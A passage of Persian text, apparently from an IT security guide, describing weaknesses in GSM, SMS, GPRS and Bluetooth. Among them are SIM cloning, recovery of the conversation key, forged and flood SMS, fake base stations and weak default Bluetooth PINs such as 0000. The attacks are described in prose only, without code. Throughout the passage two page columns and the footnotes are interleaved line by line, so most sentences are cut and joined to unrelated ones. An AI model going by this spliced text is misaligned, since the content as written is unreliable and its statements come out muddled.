‫ﺍﻳﻦ ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﻭ ﻟﺬﺍ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﭙﻲﺑﺮﺩﺍﺭﻱ )ﺳـﺎﺧﺖ‬ ‫ﻓﺼﻠﻬﺎﻱ ﺑﺨﺶ ﺳﻮﻡ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑـﺎﺭﺓ ﻧﺤـﻮﺓ ﺍﻣـﻦ ﻛـﺮﺩﻥ‬
‫ﻳﻚ ﻧﺴﺨﺔ ﻣﺸﺎﺑﻪ ﺍﺯ ﺧـﻮﺩ( ﺍﻳﻤـﻦ ﻧﻴـﺴﺘﻨﺪ‪ War driving .‬ﺑـﺮﺍﻱ‬ ‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪.‬‬
‫ﻣﺸﺘﺮﻛﻴﻦ ﺗﻠﻔﻨﻬـﺎﻱ ﻫﻤـﺮﺍﻩ ﻛـﻪ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪ GSM‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻣﺴﺌﻠﻪ ﺧﻄﺮﻧﺎﻛﻲ ﻧﻴﺴﺖ‪ .‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻃﻴﻒ ﻓﺮﻛﺎﻧﺴﻲ‪ ،‬ﺑﺎ‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺍﺭﻭﭘﺎ‪GSM :‬‬ ‫ﺩ‪.‬‬
‫ﺍﺭﺳﺎﻝ ﭘﺎﺭﺍﺯﻳﺖ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗـﻮﺍﻥ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺗﻠﻔـﻦ ﻫﻤـﺮﺍﻩ ﺭﺍ‬ ‫‪ GSM‬ﮔﺴﺘﺮﺩﻩﺗﺮﻳﻦ ﻭ ﺩﺭﺣﺎﻝ ﺭﺷﺪﺗﺮﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ‬
‫ﺩﭼﺎﺭ ﻭﻗﻔﻪ ﻛﺮﺩ‪ .‬ﻳﻚ ﺭﻭﺵ ﺑﺴﻴﺎﺭ ﻣﻌﺮﻭﻑ ﺑﺮﺍﻱ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ‬ ‫ﺩﻳﺠﻴﺘﺎﻝ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺟﻬﺎﻥ ﺍﺳﺖ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﭼﻴـﺰﻱ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﮔﻔﺘﮕﻮﻱ ‪ ١٦٤GSM‬ﺩﺭ ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺛﺎﻧﻴﻪ‬ ‫ﻧﺰﺩﻳﻚ ﺑﻪ ‪ ۶۰۰‬ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ ‪ GSM‬ﺩﺭ ﺩﻧﻴﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ‪-‬‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﺭﻗﻤﻲ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﺳﻮﻡ ﺗﻌـﺪﺍﺩ ﻛـﻞ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺳـﻴﺎﺭﻱ ﻛـﻪ ﺩﺭ‬
‫ﺟﻬﺎﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ ١٦٢.‬ﺍﻳﻦ ﺭﻗﻢ ﺑﺎ ﺳﺮﻋﺖ ﭼﻬﺎﺭ ﻛﺎﺭﺑﺮ ﺟﺪﻳﺪ ﺩﺭ‬

‫‪ ۱۶۲‬ﺳﻴﺴﺘﻢ ‪ GSM‬ﺁﻣﺮﻳﻜﺎﻱ ﺷﻤﺎﻟﻲ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻫﻨﮕـﺎﻡ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ‬


‫‪ 1800MHz‬ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻛـﺸﻮﺭﻫﺎﻱ ﺍﺭﻭﭘـﺎﻳﻲ ﻣـﻲ‪-‬‬
‫ﺧﺪﻣﺎﺕ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎ ﺳـﺮﻋﺖ ‪ 1900MHz‬ﻛـﺎﺭ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﺪﺍﺭ ﺳﻮﺋﻴﭽﻲ ﭘﺮﺳـﺮﻋﺖ ﺩﺍﺩﻩ ) ‪High Speed Circuit‬‬
‫ﺧﺪﻣﺎﺕ ﺩﺍﺩﻩﺍﻱ ‪ GSM‬ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ‪Short Message ) SMS‬‬
‫‪ (HSCSD ،Switched Data‬ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪ‪ ،‬ﻛــﻪ ﻣــﻲﺗﻮﺍﻧــﺪ‬
‫‪Analog Cellular Switched ) CSD ،(Servise‬‬
‫ﻛﺎﻧﺎﻟﻬــﺎﻱ ﺍﺭﺗﺒــﺎﻃﻲ ﻣﺨﺘﻠــﻒ ﺭﺍ ﺩﺭ ﻳــﻚ ﻛﺎﻧــﺎﻝ ﺑــﺎ ﻗﺎﺑﻠﻴــﺖ ﻛــﺎﺭ‬
‫‪General‬‬ ‫‪Packet‬‬ ‫‪Radio‬‬ ‫‪ ،(Data‬ﻭ ‪) GPRS‬‬
‫‪ 38.4KBPS‬ﺍﺩﻏﺎﻡ ﻛﻨﺪ‪ GPRS .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫‪ .(Service‬ﺑﻴﺸﺘﺮ ﺷﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﮔﻮﻧـﻪ‪-‬‬
‫‪163 Subscriber Identification Module‬‬
‫‪164 Encrypted GSM Conversation Key‬‬ ‫ﺍﻱ ﺍﺯ ‪ GSM‬ﺭﺍ ﺑﻜــﺎﺭ ﻣــﻲﺑﺮﻧــﺪ ﻛــﻪ ﻳــﺎ ﺩﺭ ‪ 900MHz‬ﻭ ﻳــﺎ ﺩﺭ‬
‫‪١٩١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺑﺮﺭﺳﻲ ﺷﺨﺼﻲ ﻣﺸﺘﺮﻳﺎﻥ ﺑـﺮﺍﻱ ﻳـﻚ ﻗﻄﻌـﻪ ﭘﻴـﺎﻡ ﻗـﺮﺍﺭﺩﺍﺩﻱ‬ ‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﺑﺴﺘﮕﻲ ﺑﻪ ﺷﺮﺍﻳﻂ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﻛـﺎﺭﺕ ‪SIM‬‬
‫ﺑﻤﻨﻈﻮﺭ ﺗﻀﻤﻴﻦ ﻛﻞ ﭘﻴـﺎﻡ ﻭ ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ ﺧـﺪﻣﺎﺕ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬ ‫ﻣﻲﺗﻮﺍﻥ ﻧﺴﺨﺔ ﺑﺪﻝ ﺍﻳﺠﺎﺩ ﻧﻤـﻮﺩ‪ .‬ﻧﻔـﻮﺫ ﺑـﻪ ﺁﻥ ﻧﻴـﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺑﺮﺭﺳﻲ ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺛﺒﺖﺷﺪﺓ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺎﺷﺪ‪.‬‬ ‫ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﺁﻥ ﺷﻜﺴﺘﻪ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻣﺸﻜﻞ ﺁﺧﺮ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﻧﺎﺍﻣﻦ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﻣﻜﺎﻟﻤـﺎﺕ ﺗﻠﻔﻨـﻲ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ‪GPRS‬‬ ‫‪ GSM‬ﻧﻴﺰ ﻣﻨﺠﺮ ﺷﻮﺩ‪.‬‬
‫‪ ١٦٩GPRS‬ﻧﻮﻋﻲ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑـﺮ ‪ IP‬ﺍﺳـﺖ ﻛـﻪ ﺑﺮﻗـﺮﺍﺭﻱ‬
‫ﺩﺭ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﺓ ﻳــﻚ ﺑﺎﻧــﻚ ﺍﺯ ﻓﻨــﺎﻭﺭﻱ ‪ GSM‬ﻣــﺸﻜﻼﺕ‬
‫ﺍﺗﺼﺎﻝ ﺩﺍﺋﻤﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ‪ .‬ﻣﺸﻜﻞ ﻋﻤﺪﺓ ﺍﻳﻦ‬
‫ﺩﻳﮕﺮﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ‬
‫ﻣﻜﺎﻧﻴﺰﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﻮﺯ ﺑﺮﺍﻱ ﺗﻘﺎﺿﺎﻫﺎﻱ ‪ WAP‬ﺑﻪ ‪SMS‬‬
‫ﺭﺍﻩ ﺩﻭﺭ ﻧﺘﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻭﺍﻗﻌﻲ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ‪،‬‬
‫ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺑﺴﺘﺔ ‪ SMS‬ﺗﻘﻠﺒﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺗﻠﻔـﻦ‬
‫ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﺟﻌﻠﻲ ﻓﺮﻳﺐ ﺩﺍﺩ‪.‬‬
‫ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﻭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺟﻌﻠﻲ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ‪ ،‬ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻧﻔﻮﺫﮔﺮ ﺍﻣﻜﺎﻥ ﻛﻨﺘﺮﻝ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﺍﻧﺠـﺎﻡ‬
‫ﻃﻮﺭﻱ ﻓﺮﻳﺐ ﺩﻫﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺮﻡ ﻛﻪ ﮔﻤـﺎﻥ‬
‫ﮔﺮﻓﺘﻪ ﺩﺭ ﺁﻥ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺭﺍ ﭘﺪﻳﺪ ﺧﻮﺍﻫﺪ ﺁﻭﺭﺩ‪.‬‬
‫ﻣﻲﻛﻨﻨﺪ ﺍﺯ ﺍﻳﻤﻨﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘـﺖ ﺗﻘﻠﺒـﻲ ﺍﺳـﺖ‬
‫ﻭﺍﺭﺩ ﻛﻨﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻠﻔﻨﻬﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ ‪ GPRS‬ﺩﺍﺭﻧـﺪ ﺍﺯ‬ ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ‪SMS‬‬
‫ﻗﺎﺑﻠﻴﺖ ‪ bluetooth‬ﻧﻴﺰ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ .‬ﻫـﺮ ﺩﺳـﺘﮕﺎﻩ ﺑـﺎ ﻗﺎﺑﻠﻴـﺖ‬ ‫‪١٦٥‬‬
‫‪ GSM‬ﺧﺪﻣﺎﺕ ﭘﻴﺎﻣﻬﺎﻱ ﻛﻮﺗﺎﻩ )‪ (SMS‬ﺭﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ‪.‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫‪ bluetooth‬ﺷﺎﻣﻞ ﻳﻚ ﺁﺩﺭﺱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﺍﺳـﺖ ﻛـﻪ ﺑـﻪ‬ ‫‪ SMS‬ﺩﺭ ﺳﻴﺴﺘﻢ ‪ GSM‬ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺩﺍﺭﺩ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ‬
‫ﻛﺎﺭﺑﺮ ﺍﻣﻜﺎﻥ ﻣﻲﺩﻫﺪ ﺑﻪ ﻧﻮﻋﻲ ﺑﻪ ﺷﺨﺼﻲ ﻛﻪ ﺩﺭ ﻃـﺮﻑ ﺩﻳﮕـﺮ‬ ‫ﺍﻋﻼﻧﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ ‪ ،‬ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ‪ SIM‬ﻣـﺸﺘﺮﻱ‪ ،‬ﺍﺭﺳـﺎﻝ‬
‫ﺍﺭﺗﺒﺎﻁ ﺍﺳﺖ ﻧﻮﻋﻲ ﺍﻋﺘﻤﺎﺩ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﻫﻤﻴﻨﻜـﻪ ﺍﻳـﻦ ﺷﻨﺎﺳـﻪ ﺑـﻪ‬ ‫ﭘﻴﺎﻣﻬــﺎﻱ ﻛﻮﺗــﺎﻩ ﻣﺘﻨــﻲ‪ ،‬ﻭ ﺍﺭﺗﺒــﺎﻁ ﺑــﺎ ﺩﺭﻭﺍﺯﻩﻫــﺎﻱ ﭘــﺴﺖ‬
‫ﻳﻚ ﻛﺎﺭﺑﺮ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪ‪ ،‬ﺑﺎ ﺩﻧﺒﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﻭ ﺑﺮﺭﺳـﻲ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ .‬ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﻣـﻮﺍﺭﺩ ﻓـﻮﻕ ﺧـﺪﻣﺎﺕ ﭘﺮﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﺷﻨﺎﺳﺔ ﺁﻧﻬـﺎ ﻣـﻲ ﺗـﻮﺍﻥ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺿـﺒﻂ ﻧﻤـﻮﺩ‪ .‬ﺩﺭ‬
‫ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺟﺪﻳـﺪﻱ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪ ﺑﻮﺟـﻮﺩ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ bluetooth‬ﺑﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ‪ ،‬ﻳـﻚ‬ ‫ﻣﻲﺁﻭﺭﻧﺪ‪ SMS .‬ﻧﻮﻋﻲ ﺳﺮﻭﻳﺲ ﺫﺧﻴﺮﻩ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﺳﺖ ﻛﻪ‬
‫ﻓﺮﺁﻳﻨﺪ ﻣﻘﺪﺍﺭﺩﻫﻲ ﺍﻭﻟﻴﻪ ﺁﻏﺎﺯ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬ ‫ﺫﺍﺗﹰﺎ ﻧﺎﺍﻣﻦ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺩﺭ ﺁﻥ ﺗﻤﺎﻡ ﭘﻴﺎﻣﻬﺎ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ‬
‫ﺍﺯ ﻳﻚ ‪ PIN‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺑﺮﺧـﻲ ﺍﺑﺰﺍﺭﻫـﺎ ﺑـﻪ ﺷـﻤﺎ‬ ‫ﻭ ﺭﻣﺰﻧﺸﺪﻩ ﺗﺒﺎﺩﻝ ﻣﻲﺷﻮﻧﺪ ﻭ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺩﺭ ﻣﺮﻛﺰ ‪SMS‬‬
‫ﺍﺟﺎﺯﻩ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺷﻤﺎﺭﺓ ‪ PIN‬ﺭﺍ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻥ ‪ PIN‬ﺭﺍ‬
‫ﭘﻴﺶ ﺍﺯ ﺍﺭﺳﺎﻝ ﺑﻪ ﻣﻘﺼﺪ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻣﺰﻧﺸﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺩﻳﮕـﺮ‬
‫ﺩﺭ ﺣﺎﻓﻈﺔ ﻳﻚ ﺩﺳـﺘﮕﺎﻩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻳـﺎ ﺩﻳـﺴﻚ ﺳـﺨﺖ ﻧﻴـﺰ‬ ‫ﻣﺸﻜﻼﺕ ‪ SMS‬ﺗﺄﺧﻴﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﭘﻴﺎﻡ ﺑـﻪ ﻣﻘـﺼﺪ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺫﺧﻴﺮﻩ ﻧﻤﻮﺩ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺳﺘﮕﺎﻩ ﺗﺄﻣﻴﻦ ﻧﺒﺎﺷـﺪ‬ ‫ﺗﺮﺍﻛﻨﺸﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﺯﻣﺎﻧﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻣـﺸﻜﻼﺕ ﻋﺪﻳـﺪﻩﺍﻱ ﺑـﻪ ﺑـﺎﺭ ﺑﻴﺎﻳﻨـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬ ‫ﺑﻪ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻨﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕـﺮ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺭﻣﺰﻫﺎﻱ ﻏﺎﻟﺐ ‪PIN‬ﻫﺎ ﺍﻋﺪﺍﺩ ﭼﻬﺎﺭ ﺭﻗﻤﻲ ﻫـﺴﺘﻨﺪ‪ ،‬ﻭ ﺷـﺎﻳﺪ ﺩﺭ‬ ‫ﺭﺍﻳﮕﺎﻥ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣـﻲﺗـﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ ‪SMS‬‬
‫ﻧﻴﻤﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﻋﺪﺩ ‪ 0000‬ﺑﺎﺷﺪ‪.‬‬ ‫ﺟﻌﻠﻲ ﺳﺎﺧﺖ‪ ،‬ﺑﻪ ﮔﻮﺷﻲﻫﺎ ﻭ ﻣﺮﺍﻛﺰ ‪ SMS‬ﺳـﻴﻠﻲ ﺍﺯ ﺑﻤﺒﻬـﺎﻱ‬
‫ﺍﻣﻨﻴــﺖ ‪ bluetooth‬ﺩﺭ ﮔــﺮﻭ ﻧﮕﻬــﺪﺍﺭﻱ ﺍﺯ ﻛﻠﻴــﺪ ﺭﻣﺰﻧﮕــﺎﺭﻱ‬ ‫‪ SMS‬ﻓﺮﺳﺘﺎﺩ‪ ،‬ﻭ ﻳﺎ ﺑﺴﺘﻪﻫﺎﻱ ‪ SMS‬ﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻛﺮﺩ‬
‫ﺑﺼﻮﺭﺕ ﻳﻚ ﺭﺍﺯ ﻣﺸﺘﺮﻙ ﻣﻴﺎﻥ ﺍﻋﻀﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺖ‪ .‬ﺍﻣﺎ ﺗـﺼﻮﺭ‬ ‫ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺧﺮﺍﺑﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺷﻮﻧﺪ‪.‬‬
‫ﻛﻨﻴــﺪ ﻣــﻦ ﻭ ﺷــﻤﺎ ﺑــﺎ ﺗﻠﻔﻨﻬــﺎﻱ ﻫﻤــﺮﺍﻩ ﺧــﻮﺩ ﻛــﻪ ﻗﺎﺑﻠﻴــﺖ‬
‫‪ bluetooth‬ﺩﺍﺭﻧﺪ ﺩﺭﺣـﺎﻝ ﻣﻜﺎﻟﻤـﻪ ﻫـﺴﺘﻴﻢ‪ .‬ﺑـﺮﺍﻱ ﺑﺮﻗـﺮﺍﺭﻱ‬ ‫ﻓﻨﺎﻭﺭﻱ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ‪ ١٦٦(STK) SIM‬ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺮﺍﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ‬
‫ﺍﻣﻨﻴﺖ ﻣﻜﺎﻟﻤﻪ‪ ،‬ﻣﻦ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺷﻤﺎ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻜﺎﻟﻤـﻪ ﺭﺍ‬ ‫‪ SMS‬ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ‪ STK‬ﻳﻚ ﺳﺎﺯ ﻭ ﻛﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳـﺔ‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻲﻛﻨﻢ‪ .‬ﻛﻤﻲ ﺑﻌـﺪﺗﺮ ﻳﻜـﻲ ﺍﺯ ﺩﻭﺳـﺘﺎﻧﺘﺎﻥ ﺑـﺎ ﺷـﻤﺎ‬ ‫ﺍﻧﺘﻘﺎﻝ‪ ١٦٧‬ﺍﺳﺖ‪ ،‬ﻭ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺎﻳﺎﻧـﻪ ﺑـﻪ ﭘﺎﻳﺎﻧـﻪ‪ ١٦٨‬ﺭﺍ‬
‫ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ ﻭ ﺷﻤﺎ ﻣﺠﺪﺩﹰﺍ ﺍﺯ ﻛﻠﻴﺪ ﺧﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻴـﺪ‪.‬‬ ‫ﺗﻀﻤﻴﻦ ﻛﻨﺪ‪ .‬ﻳﻚ ﺭﻭﺍﻝ ﺩﻳﮕﺮ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴـﺖ ‪ SMS‬ﻣـﻲﺗﻮﺍﻧـﺪ‬
‫ﻣﻦ ﻛﻪ ﻛﻠﻴﺪ ﺷﻤﺎ ﺭﺍ ﻣﻲﺩﺍﻧﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻳـﻚ ﺁﺩﺭﺱ ﺟﻌﻠـﻲ‬
‫‪165‬‬ ‫‪Short Message Service‬‬
‫‪166‬‬ ‫‪SIM Toolkit Technology‬‬
‫‪167‬‬ ‫‪Transport Layer‬‬
‫‪169 General Packet Radio Service‬‬ ‫‪168‬‬ ‫‪End-to-End Confidentiality‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٩٢‬‬

‫ﻳﻚ ﺷﺒﻜﻪ ﺳﻴﻤﻲ ﻣﻲﺷﻮﻧﺪ ﺗﺎ ﺑـﻪ ﺳـﻤﺖ ﻣﻘـﺼﺪ ﻧﻬـﺎﻳﻲ ﺧـﻮﺩ‬ ‫ﻣﻲﺗﻮﺍﻧﻢ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻢ‪ ،‬ﻭ ﺑﻪ ﻣﻜﺎﻟﻤـﺔ ﺷـﻤﺎ‬
‫ﻫــﺪﺍﻳﺖ ﮔﺮﺩﻧــﺪ‪ .‬ﺩﺭ ﺁﻥ ‪ ،gateway‬ﭘﻴــﺎﻡ ‪ WTLS‬ﺑــﻪ ‪SSL‬‬ ‫ﮔﻮﺵ ﻛﻨﻢ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻢ ﺧﻮﺩﻡ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺷﻤﺎ ﻳﺎ ﻛـﺴﻲ‬
‫ﺗﺒﺪﻳﻞ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ‪ gateway‬ﭘﻴﺎﻡ ﺑﺮﺍﻱ ﭼﻨﺪ ﺛﺎﻧﻴﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ‬ ‫ﻛﻪ ﺩﺭﺣﺎﻝ ﻣﻜﺎﻟﻤﻪ ﺑﺎ ﺷﻤﺎ ﺍﺳﺖ ﺟﺎ ﺑﺰﻧﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ‪bluetooth‬‬
